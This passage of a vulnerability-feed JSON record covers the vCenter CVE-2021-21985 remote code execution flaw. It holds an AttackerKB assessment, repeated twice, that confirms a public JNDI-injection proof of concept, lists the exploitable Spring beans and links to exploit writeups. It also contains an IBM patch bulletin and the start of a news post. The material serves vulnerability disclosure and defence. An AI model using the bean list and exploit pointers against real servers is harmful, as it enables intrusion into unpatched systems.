"vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2022-08-19T11:06:39", "description": "The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.\n\n \n**Recent assessments:** \n \n**wvu-r7** at May 28, 2021 10:35pm UTC reported:\n\nDocked exploitability a point because a valid bean and method must be known. See the [Rapid7 analysis](<https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985#rapid7-analysis>) for more context.\n\n**ETA:** Cat\u2019s out of the bag. [JNDI injection PoC.](<https://www.iswin.org/2021/06/02/Vcenter-Server-CVE-2021-21985-RCE-PAYLOAD/>) I\u2019ve confirmed it works. Here are all the [beans](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/beans/factory/config/MethodInvokingFactoryBean.html>) you can use for this:\n \n \n vsanCapabilityUtils_setVsanCapabilityCacheManager\n vsanFormatUtils_setUserSessionService\n vsanProviderUtils_setVmodlHelper\n vsanProviderUtils_setVsanServiceFactory\n vsanQueryUtil_setDataService\n vsanUtils_setMessageBundle\n vsphereHealthProviderUtils_setVsphereHealthServiceFactory\n \n\nFor reference, here are all the registered beans in my environment:\n \n \n advancedOptionsService\n capabilityPropertyProviderImpl\n ceipService\n clusterDpConfigService\n cnManager\n computeInventoryService\n configureClusterService\n configureStretchedClusterService\n configureVsanClusterMutationProviderImpl\n connectionRetention\n dataAccessController\n dataService\n dataServiceExtensionRegistry\n datacenterInventoryService\n diskGroupMutationService\n diskManagementService\n dpClient\n dpFactory\n encryptionMutationProvider\n encryptionPropertyProvider\n 
execFactory\n execSettings\n guardRailPropertyProviderAdapter\n hciClusterService\n healthCheckDelay\n healthCheckTimeout\n legacyVsanObjectVersionProviderImpl\n localizedMessageBundle\n lookupSvcClient\n lsFactory\n lsLocator\n multiVmRestoreBacking\n mvcContentNegotiationManager\n mvcCorsConfigurations\n mvcHandlerMappingIntrospector\n mvcUriComponentsContributor\n networkInventoryService\n networkIpConfigProvider\n obfuscationController\n obfuscationService\n objectReferenceService\n org.eclipse.gemini.blueprint.service.exporter.support.OsgiServiceFactoryBean#0\n org.eclipse.gemini.blueprint.service.exporter.support.OsgiServiceFactoryBean#1\n org.eclipse.gemini.blueprint.service.exporter.support.OsgiServiceFactoryBean#2\n org.springframework.context.annotation.internalAsyncAnnotationProcessor\n org.springframework.context.annotation.internalAutowiredAnnotationProcessor\n org.springframework.context.annotation.internalCommonAnnotationProcessor\n org.springframework.context.annotation.internalConfigurationAnnotationProcessor\n org.springframework.context.annotation.internalPersistenceAnnotationProcessor\n org.springframework.context.annotation.internalRequiredAnnotationProcessor\n org.springframework.context.annotation.internalScheduledAnnotationProcessor\n org.springframework.context.event.internalEventListenerFactory\n org.springframework.context.event.internalEventListenerProcessor\n org.springframework.format.support.FormattingConversionServiceFactoryBean#0\n org.springframework.web.servlet.handler.BeanNameUrlHandlerMapping\n org.springframework.web.servlet.handler.MappedInterceptor#0\n org.springframework.web.servlet.mvc.HttpRequestHandlerAdapter\n org.springframework.web.servlet.mvc.SimpleControllerHandlerAdapter\n org.springframework.web.servlet.mvc.annotation.ResponseStatusExceptionResolver#0\n org.springframework.web.servlet.mvc.method.annotation.ExceptionHandlerExceptionResolver#0\n 
org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter\n org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping\n org.springframework.web.servlet.mvc.support.DefaultHandlerExceptionResolver#0\n org.springframework.web.servlet.view.ContentNegotiatingViewResolver#0\n pbmClient\n pbmDataProviderImpl\n pbmFactory\n permissionService\n physicalDisksService\n proactiveTestsService\n promoteActionController\n proxygenController\n purgeInaccessibleVmSwapObjectsProvider\n restoreWorkflowBacking\n sessionScheduler\n singleVmRestoreBacking\n ssoFactory\n taskService\n updateDbService\n userSessionService\n vcClient\n vcFactory\n vcPropertiesFacade\n virtualObjectsDataProtectionController\n virtualObjectsService\n vlsiSettingsTemplate\n vmConsistencyGroupPropertyProvider\n vmDataProtectionPropertyProviderAdapter\n vmDataProtectionSummaryController\n vmDataProtectionSyncPointsController\n vmDiskPlacementProvider\n vmFolderInventorySerivce\n vmInventoryService\n vmodlContext\n vmodlHelper\n vsanCapabilityCacheManager\n vsanCapabilityUtils_setVsanCapabilityCacheManager\n vsanClusterPropertyProviderAdapter\n vsanClusterPropertyProviderAdapterImpl\n vsanComponentsProviderImpl\n vsanConfigPropertyProviderAdapter\n vsanConfigPropertyProviderAdapterImpl\n vsanConfigService\n vsanDiskMappingsProvider\n vsanDpInventoryHelper\n vsanDpServicePitProvider\n vsanExecutor\n vsanFolderPropertyProviderAdapter\n vsanFolderPropertyProviderAdapterImpl\n vsanFormatUtils_setUserSessionService\n vsanHealthProviderImpl\n vsanHealthServiceMutationProviderImpl\n vsanHostPropertyProviderAdapter\n vsanIscsiInitiatorGroupMutationProviderImpl\n vsanIscsiInitiatorGroupPropertyProviderImpl\n vsanIscsiMutationProviderImpl\n vsanIscsiPropertyProviderImpl\n vsanIscsiTargetDataAdapter\n vsanIscsiTargetDataAdapterImpl\n vsanIscsiTargetMutationProviderImpl\n vsanIscsiTargetPropertyProviderImpl\n vsanMutationProviderImpl\n vsanObjectSystemProvider\n 
vsanPerfDiagnosticProviderImpl\n vsanPerfMutationProviderImpl\n vsanPerfProviderImpl\n vsanPropertyProviderImpl\n vsanProviderUtils_setVmodlHelper\n vsanProviderUtils_setVsanServiceFactory\n vsanQueryUtil_setDataService\n vsanResyncingComponentsProvider\n vsanResyncingComponentsRetriever\n vsanResyncingIscsiTargetComponentsProvider\n vsanServiceBundleActivator\n vsanServiceFactory\n vsanStretchedClusterMutationProviderImpl\n vsanStretchedClusterPropertyProviderImpl\n vsanSupportMutationProviderImpl\n vsanSupportProviderImpl\n vsanThreadPoolImpl\n vsanUpgradeMutationProviderImpl\n vsanUpgradePropertyProviderAdapter\n vsanUpgradeProviderImpl\n vsanUtils_setMessageBundle\n vsanVirtualDisksDataProvider\n vsanVirtualObjectsProvider\n vsanWorkerThreadFactory\n vsphereHealthProviderUtils_setVsphereHealthServiceFactory\n vsphereHealthServiceFactory\n vsphereHealthThreadPoolImpl\n vumLoginService\n vumPropertyProviderAdapter\n whatIfPropertyProviderAdapter\n whatIfPropertyProviderImpl\n witnessCandidateInventoryService\n witnessHostsProvider\n \n\nNote that `methodInput` is still ~~limited~~ somewhat limited by what `ProxygenSerializer` can deserialize, so the JNDI injection via [static method](<https://docs.oracle.com/javase/tutorial/jndi/ops/lookup.html>) is good for arbitrary method invocation, callback notwithstanding. Jang ([**@testanull**](<https://twitter.com/testanull>)) [points out](<https://twitter.com/testanull/status/1400724415411748865>) that `TypeConverter` can be leveraged to work around this issue. Jang\u2019s writeup is [here](<https://testbnull.medium.com/a-quick-look-at-cve-2021-21985-vcenter-pre-auth-rce-9ecd459150a5>).\n\n**Update:** A ~~new RCE chain~~ [writeup](<http://noahblog.360.cn/vcenter-cve-2021-2021-21985/>) involving SSRF has been published [by the original researcher].\n\n**ccondon-r7** at May 26, 2021 5:41pm UTC reported:\n\nDocked exploitability a point because a valid bean and method must be known. 
See the [Rapid7 analysis](<https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985#rapid7-analysis>) for more context.\n\n**ETA:** Cat\u2019s out of the bag. [JNDI injection PoC.](<https://www.iswin.org/2021/06/02/Vcenter-Server-CVE-2021-21985-RCE-PAYLOAD/>) I\u2019ve confirmed it works. Here are all the [beans](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/beans/factory/config/MethodInvokingFactoryBean.html>) you can use for this:\n \n \n vsanCapabilityUtils_setVsanCapabilityCacheManager\n vsanFormatUtils_setUserSessionService\n vsanProviderUtils_setVmodlHelper\n vsanProviderUtils_setVsanServiceFactory\n vsanQueryUtil_setDataService\n vsanUtils_setMessageBundle\n vsphereHealthProviderUtils_setVsphereHealthServiceFactory\n \n\nFor reference, here are all the registered beans in my environment:\n \n \n advancedOptionsService\n capabilityPropertyProviderImpl\n ceipService\n clusterDpConfigService\n cnManager\n computeInventoryService\n configureClusterService\n configureStretchedClusterService\n configureVsanClusterMutationProviderImpl\n connectionRetention\n dataAccessController\n dataService\n dataServiceExtensionRegistry\n datacenterInventoryService\n diskGroupMutationService\n diskManagementService\n dpClient\n dpFactory\n encryptionMutationProvider\n encryptionPropertyProvider\n execFactory\n execSettings\n guardRailPropertyProviderAdapter\n hciClusterService\n healthCheckDelay\n healthCheckTimeout\n legacyVsanObjectVersionProviderImpl\n localizedMessageBundle\n lookupSvcClient\n lsFactory\n lsLocator\n multiVmRestoreBacking\n mvcContentNegotiationManager\n mvcCorsConfigurations\n mvcHandlerMappingIntrospector\n mvcUriComponentsContributor\n networkInventoryService\n networkIpConfigProvider\n obfuscationController\n obfuscationService\n objectReferenceService\n org.eclipse.gemini.blueprint.service.exporter.support.OsgiServiceFactoryBean#0\n org.eclipse.gemini.blueprint.service.exporter.support.OsgiServiceFactoryBean#1\n 
org.eclipse.gemini.blueprint.service.exporter.support.OsgiServiceFactoryBean#2\n org.springframework.context.annotation.internalAsyncAnnotationProcessor\n org.springframework.context.annotation.internalAutowiredAnnotationProcessor\n org.springframework.context.annotation.internalCommonAnnotationProcessor\n org.springframework.context.annotation.internalConfigurationAnnotationProcessor\n org.springframework.context.annotation.internalPersistenceAnnotationProcessor\n org.springframework.context.annotation.internalRequiredAnnotationProcessor\n org.springframework.context.annotation.internalScheduledAnnotationProcessor\n org.springframework.context.event.internalEventListenerFactory\n org.springframework.context.event.internalEventListenerProcessor\n org.springframework.format.support.FormattingConversionServiceFactoryBean#0\n org.springframework.web.servlet.handler.BeanNameUrlHandlerMapping\n org.springframework.web.servlet.handler.MappedInterceptor#0\n org.springframework.web.servlet.mvc.HttpRequestHandlerAdapter\n org.springframework.web.servlet.mvc.SimpleControllerHandlerAdapter\n org.springframework.web.servlet.mvc.annotation.ResponseStatusExceptionResolver#0\n org.springframework.web.servlet.mvc.method.annotation.ExceptionHandlerExceptionResolver#0\n org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter\n org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping\n org.springframework.web.servlet.mvc.support.DefaultHandlerExceptionResolver#0\n org.springframework.web.servlet.view.ContentNegotiatingViewResolver#0\n pbmClient\n pbmDataProviderImpl\n pbmFactory\n permissionService\n physicalDisksService\n proactiveTestsService\n promoteActionController\n proxygenController\n purgeInaccessibleVmSwapObjectsProvider\n restoreWorkflowBacking\n sessionScheduler\n singleVmRestoreBacking\n ssoFactory\n taskService\n updateDbService\n userSessionService\n vcClient\n vcFactory\n vcPropertiesFacade\n 
virtualObjectsDataProtectionController\n virtualObjectsService\n vlsiSettingsTemplate\n vmConsistencyGroupPropertyProvider\n vmDataProtectionPropertyProviderAdapter\n vmDataProtectionSummaryController\n vmDataProtectionSyncPointsController\n vmDiskPlacementProvider\n vmFolderInventorySerivce\n vmInventoryService\n vmodlContext\n vmodlHelper\n vsanCapabilityCacheManager\n vsanCapabilityUtils_setVsanCapabilityCacheManager\n vsanClusterPropertyProviderAdapter\n vsanClusterPropertyProviderAdapterImpl\n vsanComponentsProviderImpl\n vsanConfigPropertyProviderAdapter\n vsanConfigPropertyProviderAdapterImpl\n vsanConfigService\n vsanDiskMappingsProvider\n vsanDpInventoryHelper\n vsanDpServicePitProvider\n vsanExecutor\n vsanFolderPropertyProviderAdapter\n vsanFolderPropertyProviderAdapterImpl\n vsanFormatUtils_setUserSessionService\n vsanHealthProviderImpl\n vsanHealthServiceMutationProviderImpl\n vsanHostPropertyProviderAdapter\n vsanIscsiInitiatorGroupMutationProviderImpl\n vsanIscsiInitiatorGroupPropertyProviderImpl\n vsanIscsiMutationProviderImpl\n vsanIscsiPropertyProviderImpl\n vsanIscsiTargetDataAdapter\n vsanIscsiTargetDataAdapterImpl\n vsanIscsiTargetMutationProviderImpl\n vsanIscsiTargetPropertyProviderImpl\n vsanMutationProviderImpl\n vsanObjectSystemProvider\n vsanPerfDiagnosticProviderImpl\n vsanPerfMutationProviderImpl\n vsanPerfProviderImpl\n vsanPropertyProviderImpl\n vsanProviderUtils_setVmodlHelper\n vsanProviderUtils_setVsanServiceFactory\n vsanQueryUtil_setDataService\n vsanResyncingComponentsProvider\n vsanResyncingComponentsRetriever\n vsanResyncingIscsiTargetComponentsProvider\n vsanServiceBundleActivator\n vsanServiceFactory\n vsanStretchedClusterMutationProviderImpl\n vsanStretchedClusterPropertyProviderImpl\n vsanSupportMutationProviderImpl\n vsanSupportProviderImpl\n vsanThreadPoolImpl\n vsanUpgradeMutationProviderImpl\n vsanUpgradePropertyProviderAdapter\n vsanUpgradeProviderImpl\n vsanUtils_setMessageBundle\n vsanVirtualDisksDataProvider\n 
vsanVirtualObjectsProvider\n vsanWorkerThreadFactory\n vsphereHealthProviderUtils_setVsphereHealthServiceFactory\n vsphereHealthServiceFactory\n vsphereHealthThreadPoolImpl\n vumLoginService\n vumPropertyProviderAdapter\n whatIfPropertyProviderAdapter\n whatIfPropertyProviderImpl\n witnessCandidateInventoryService\n witnessHostsProvider\n \n\nNote that `methodInput` is still ~~limited~~ somewhat limited by what `ProxygenSerializer` can deserialize, so the JNDI injection via [static method](<https://docs.oracle.com/javase/tutorial/jndi/ops/lookup.html>) is good for arbitrary method invocation, callback notwithstanding. Jang ([**@testanull**](<https://twitter.com/testanull>)) [points out](<https://twitter.com/testanull/status/1400724415411748865>) that `TypeConverter` can be leveraged to work around this issue. Jang\u2019s writeup is [here](<https://testbnull.medium.com/a-quick-look-at-cve-2021-21985-vcenter-pre-auth-rce-9ecd459150a5>).\n\n**Update:** A ~~new RCE chain~~ [writeup](<http://noahblog.360.cn/vcenter-cve-2021-2021-21985/>) involving SSRF has been published [by the original researcher].\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-26T00:00:00", "type": "attackerkb", "title": "CVE-2021-21985", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", 
"integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-2021", "CVE-2021-21972", "CVE-2021-21985"], "modified": "2021-06-29T00:00:00", "id": "AKB:462BB7BE-5D1C-4847-AE1A-07B008F34C9D", "href": "https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ibm": [{"lastseen": "2022-10-01T01:39:16", "description": "## Summary\n\nMultiple vulnerabilities in VMware vCenter plugins affect IBM Cloud Pak System. IBM Cloud Pak System in response to the vulnerabilities in VMware vCenter, provides the new release of IBM Cloud Pak System V2.3.3.4, with a new vCenter Image. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-21985](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21985>) \n** DESCRIPTION: **VMware vCenter Server and Cloud Foundation could allow a remote attacker to execute arbitrary commands on the system, caused by improper validation of user-supplied input by the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. By sending a specially-crafted request using port 443, an attacker could exploit this vulnerability to execute arbitrary commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/202404](<https://exchange.xforce.ibmcloud.com/vulnerabilities/202404>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-21986](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21986>) \n** DESCRIPTION: **VMware vCenter Server and Cloud Foundation could allow a remote attacker to bypass security restrictions, caused by a flaw in a vSphere authentication mechanism for the Virtual SAN Health Check, Site Recovery, vSphere Lifecycle Manager, and VMware Cloud Director Availability plug-ins. By sending a specially-crafted request using port 443, an attacker could exploit this vulnerability to bypass authentication and perform actions allowed by the impacted plug-ins without authentication. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/202403](<https://exchange.xforce.ibmcloud.com/vulnerabilities/202403>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2021-21991](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21991>) \n** DESCRIPTION: **VMware vCenter Server and Cloud Foundation could allow a local authenticated attacker to gain elevated privileges on the system, caused by improper handling of session tokens. An attacker could exploit this vulnerability to escalate privileges to Administrator on the vSphere Client. \nCVSS Base score: 8.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/209752](<https://exchange.xforce.ibmcloud.com/vulnerabilities/209752>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-21992](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21992>) \n** DESCRIPTION: **VMware vCenter Server and Cloud Foundation are vulnerable to a denial of service, caused by improper XML entity parsing. A remote authenticated attacker could exploit this vulnerability to cause a denial of service on the vCenter Server host. 
\nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/209751](<https://exchange.xforce.ibmcloud.com/vulnerabilities/209751>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-21993](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21993>) \n** DESCRIPTION: **VMware vCenter Server and Cloud Foundation are vulnerable to server-side request forgery, caused by improper validation of URLs in vCenter Server Content Library. By sending a specially-crafted POST request, a remote authenticated attacker could exploit this to obtain sensitive information. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/209750](<https://exchange.xforce.ibmcloud.com/vulnerabilities/209750>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2021-22006](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22006>) \n** DESCRIPTION: **VMware vCenter Server and Cloud Foundation could allow a remote attacker to bypass security restrictions, caused by improper handling of the URI by endpoints. An attacker could exploit this vulnerability to access restricted endpoints. \nCVSS Base score: 8.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/209748](<https://exchange.xforce.ibmcloud.com/vulnerabilities/209748>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2021-22008](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22008>) \n** DESCRIPTION: **VMware vCenter Server could allow a remote attacker to obtain sensitive information. By sending a specially crafted jsonrpc message, a remote attacker could exploit this vulnerability to obtain sensitive information. 
\nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/209746](<https://exchange.xforce.ibmcloud.com/vulnerabilities/209746>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2021-22009](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22009>) \n** DESCRIPTION: **VMware vCenter Server and Cloud Foundation are vulnerable to a denial of service, caused by an error in VAPI (vCenter API) service. A remote attacker could exploit this vulnerability to consume excessive memory resources. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/209745](<https://exchange.xforce.ibmcloud.com/vulnerabilities/209745>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2021-22010](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22010>) \n** DESCRIPTION: **VMware vCenter Server and Cloud Foundation are vulnerable to a denial of service, caused by an error in VPXD (Virtual Provisioning X Daemon) service. A remote attacker could exploit this vulnerability to consume excessive memory resources. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/209744](<https://exchange.xforce.ibmcloud.com/vulnerabilities/209744>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2021-22011](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22011>) \n** DESCRIPTION: **VMware vCenter Server and Cloud Foundation could allow a remote attacker to bypass security restrictions, caused by an unauthenticated API endpoint vulnerability. An attacker could exploit this vulnerability to manipulate VM network settings. 
\nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/209743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/209743>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:H) \n \n** CVEID: **[CVE-2021-22016](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22016>) \n** DESCRIPTION: **VMware vCenter Server is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/209738](<https://exchange.xforce.ibmcloud.com/vulnerabilities/209738>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-22017](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22017>) \n** DESCRIPTION: **Rhttproxy as used in VMware vCenter Server and Cloud Foundation could allow a remote attacker to bypass security restrictions, caused by the improper implementation of URI normalization. An attacker could exploit this vulnerability to bypass proxy leading to internal endpoints being accessed. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/209737](<https://exchange.xforce.ibmcloud.com/vulnerabilities/209737>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Cloud Pak System| V2.3.0.1, V.2.3.1.1, v.2.3.2.0 \nIBM Cloud Pak System| v2.3.3.0, v.2.3.3.1, v.2.3.3.2, v.2.3.3.3, v2.3.3.3 iFix 1 \n \n## Remediation/Fixes\n\nFor unsupported or end of life release recommendation is to upgrade to supported fixed release of the product.\n\nIBM Cloud Pak System, in response to the vulnerabilities above provides the new release of IBM Cloud Pak System V2.3.3.4, with new Windows vCenter Image update to vCenter 6.7 U3o. \n\nFor IBM Cloud Pak System V2.3.0.1, V.2.3.1.1, v.2.3.2.0, v2.3.3.0, v.2.3.3.1, v.2.3.3.2, v.2.3.3.3, v2.3.3.3 iFix 1\n\nupgrade to IBM Cloud Pak System v2.3.3.4 at [Fix Central](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=PureSystems&product=ibm/WebSphere/IBM+Cloud+Pak+System&release=2.3.3.4&platform=Linux&function=all> \"Fix Central\" )\n\nIf you are not able to upgrade or for earlier releases, until you upgrade apply workaround as provided [here.](<https://www.ibm.com/support/pages/node/6537856> \"here\" )\n\nInformation on upgrading can be found here: [http://www.ibm.com/support/docview.wss?uid=ibm10887959.](<http://www.ibm.com/support/docview.wss?uid=ibm10887959>)\n\n## Workarounds and Mitigations\n\nNone.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n[VMSA-2021-0010](<https://www.vmware.com/security/advisories/VMSA-2021-0010.html> \"VMware vCenter Server updates address remote code execution and authentication vulnerabilities \\(CVE-2021-21985, 
CVE-2021-21986\\)\" )\n\n[VMSA-2021-0020](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html> \"VMware vCenter Server updates address multiple security vulnerabilities\" )\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n14 Oct 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU025\",\"label\":\"IBM Cloud and Cognitive Software\"},\"Product\":{\"code\":\"SSFQWQ\",\"label\":\"IBM Cloud Pak System\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"2.3\",\"Edition\":\"\"}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-06T21:11:34", "type": "ibm", "title": "Security Bulletin: Multiple Vulnerabilities in VMware vCenter affect IBM Cloud Pak System", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985", "CVE-2021-21986", "CVE-2021-21991", "CVE-2021-21992", "CVE-2021-21993", "CVE-2021-22006", "CVE-2021-22008", "CVE-2021-22009", "CVE-2021-22010", "CVE-2021-22011", "CVE-2021-22016", "CVE-2021-22017"], "modified": "2022-05-06T21:11:34", "id": "CBB1F0F0AF16A09B88EDDD5E242727A3EF12C793CFCE5ED8C34772D7D40B12CB", "href": "https://www.ibm.com/support/pages/node/6507111", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2021-07-28T14:34:07", "description": "Hello guys! The fourth episode of Last Week\u2019s Security news, July 12 \u2013 July 18.\n\nI would like to start with some new public exploits. I think these 4 are the most interesting.\n\n * If you remember, 2 weeks ago I mentioned the ForgeRock Access Manager and OpenAM vulnerability (CVE-2021-35464). Now there is a [public RCE exploit](<https://vulners.com/packetstorm/PACKETSTORM:163525>) for it. ForgeRock OpenAM server is a popular access management solution for web applications. [Michael Stepankin, Researcher](<https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464>): "In short, RCE is possible thanks to unsafe Java deserialization in the Jato framework used by OpenAM". And now this vulnerability [is Under Active Attack](<https://thehackernews.com/2021/07/critical-rce-flaw-in-forgerock-access.html>). 
